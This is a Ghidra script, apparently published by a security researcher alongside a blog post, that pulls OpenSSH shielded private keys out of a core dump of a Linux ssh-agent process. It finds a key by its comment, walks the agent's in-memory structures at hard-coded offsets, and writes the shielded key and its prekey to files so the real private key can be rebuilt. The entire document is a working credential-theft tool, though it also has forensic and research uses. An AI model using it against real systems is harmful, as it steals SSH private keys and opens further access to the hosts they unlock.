//Extracts OpenSSH Shielded Private Keys from a x86_64 linux ssh-agent gcore file
//More info:
//https://security.humanativaspa.it/openssh-ssh-agent-shielded-private-key-extraction-x86_64-linux/
//@author piergiovanni.cipolloni@hnsecurity.it
//@category Memory
//@keybinding 
//@menupath 
//@toolbar 

import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;

import ghidra.app.script.GhidraScript;
import ghidra.program.model.util.*;
import ghidra.program.model.reloc.*;
import ghidra.program.model.data.*;
import ghidra.program.model.block.*;
import ghidra.program.model.symbol.*;
import ghidra.program.model.scalar.*;
import ghidra.program.model.mem.*;
import ghidra.program.model.listing.*;
import ghidra.program.model.lang.*;
import ghidra.program.model.pcode.*;
import ghidra.program.model.address.*;
import ghidra.util.SystemUtilities;

public class ospke extends GhidraScript {

    public void run() throws Exception {
        Long prekey_len;
        byte[] shieldedPrivateKey;
        byte[] shieldedPreKey;
        int keyFound = 0;

        String comment = null;
        String directory = null;

        if(SystemUtilities.isInHeadlessMode()) {

                String[] args = getScriptArgs();

                if(args.length == 2) {
                        comment = args[0];
                        directory = args[1];

                } else {
                        println("ospke.java [core file] [destination directory]");
                        return;
                }

        } else {
                comment = askString("Extract OpenSSH Shielded Private Keys from ssh-agent gcore", "Insert the key comment you're looking for");
        }

        printf("Searching for this identity: %s\n", comment);

        // Search for comment address in memory
        Address comment_addr = find(comment);
        if (comment_addr == null) 
        {
                println("Key comment not found! Exiting..."); 
                return;
        }

        goTo(comment_addr); 

        Reference[] xrefs = getReferencesTo(comment_addr); // Search for XREFs to comment_addr


        for (int i = 0; i < xrefs.length; i++) {

                printf("This is the XREF to the comment                 0x%s\n", xrefs[i].getFromAddress().toString());

                Address keyaddr = xrefs[i].getFromAddress().subtract(0x08); // Key ptr is 8bytes (addr size) before the comment ptr

                printf("This is the ptr to the key addres               0x%s\n", keyaddr);
                printf("This is the actual key addreess                 0x%x\n", getLong(keyaddr));

                String addrToParse = String.format("0x%08x", getLong(keyaddr));

                Address keyptr = parseAddress(addrToParse);

                if(getLong(keyptr.add(0xa0)) == 0x4000) {

                        printf("PREKEY LEN = 0x%x Cool...now extract the key\n", getLong(keyptr.add(0xa0)));
                        println();

                        keyFound = 1;


                        printf("This is the addr pointed by *shielded_private           0x%x\n", getLong(keyptr.add(0x88)));
                        printf("This is the addr of shielded_len                        0x%s\n", keyptr.add(0x90));
                        printf("This is the actual shielded private length              %d\n", getLong(keyptr.add(0x90)));
                        printf("This is the addr pointed by *shield_prekey              0x%x\n", getLong(keyptr.add(0x98)));
                        printf("This is the addr of shield_prekey_len                   0x%s\n", keyptr.add(0xa0));

                        if(getLong(keyptr.add(0x08)) != 0) println("It's a RSA KEY");
                        if(getLong(keyptr.add(0x10)) != 0) println("It's a DSA KEY");

                        shieldedPrivateKey = getBytes(parseAddress(String.format("0x%08x", getLong(keyptr.add(0x88)))), (int)getLong(keyptr.add(0x90)));

                        shieldedPreKey = getBytes(parseAddress(String.format("0x%08x", getLong(keyptr.add(0x98)))), 0x4000);

                        if(!SystemUtilities.isInHeadlessMode()){

                                directory = askString("Key Found!", "Insert the directory where you want to save the extracted keys");
                        }
                        //String directory = "/tmp";
                        File privateKey = new File(directory + "/shielded_private");
                        File preKey = new File(directory + "/shield_prekey");

                        try (FileOutputStream fos = new FileOutputStream(privateKey))
                        {
                                fos.write(shieldedPrivateKey);
                                println("Shileded Private Key Successfully written " + directory + "/shielded_private");
                        } catch (IOException e) {
                                e.printStackTrace();
                        }

                        try (FileOutputStream fos = new FileOutputStream(preKey))
                        {
                                fos.write(shieldedPreKey);
                                println("Shiled Pre Key Successfully written " + directory + "/shield_prekey");
                        } catch (IOException e) {
                                e.printStackTrace();
                        }
                        break;
                } else { continue; }
        }
        if(keyFound == 1)
        {
                println("Done");
        } else
        {
                println("Something went wrong, keys not found!");
        }
    }
}